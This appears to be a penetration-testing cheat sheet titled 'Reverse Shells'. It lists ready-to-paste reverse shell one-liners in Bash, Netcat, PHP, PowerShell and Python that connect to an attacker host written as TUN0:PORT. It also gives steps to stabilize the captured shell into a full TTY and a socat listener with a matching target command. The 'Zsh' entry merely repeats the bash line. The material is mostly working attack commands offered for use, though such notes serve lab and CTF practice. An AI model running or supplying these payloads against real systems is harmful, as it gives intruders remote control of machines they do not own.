Skip to main content

Reverse Shells

Basic Reverse Shell Payloads

# Bash
bash -c 'exec bash -i &>/dev/tcp/TUN0/PORT <&1'

# Zsh
bash -c 'exec bash -i &>/dev/tcp/TUN0/PORT <&1'

# Netcat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc TUN0 PORT >/tmp/f

# Php
php -r '$sock=fsockopen(getenv("TUN0"),getenv("PORT"));exec("/bin/sh -i <&3 >&3 2>&3");'

# PowerShell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('TUN0',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("TUN0",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Stablize Shells (TTY Shell)

Python

# Fully Interactive TTY
python3 -c 'import pty;pty.spawn("/bin/bash")'

# Enable Autocomplete or arrow keys
export TERM=xterm # This will give us access to term commands such as clear
Ctrl + Z # Background the Shell

# This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes
stty raw -echo; fg
stty rows 38 columns 116

Socat

# Attack Host (Listening)
socat file:`tty`,raw,echo=0 tcp-listen:6969

# Target Host
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<TUN0-IP>:4444
success

If there is no socat as well, we can upload a static socat binary from here.

Reverse Shell Payloads

We can find all kind of reverse shell payloads from https://www.revshells.com/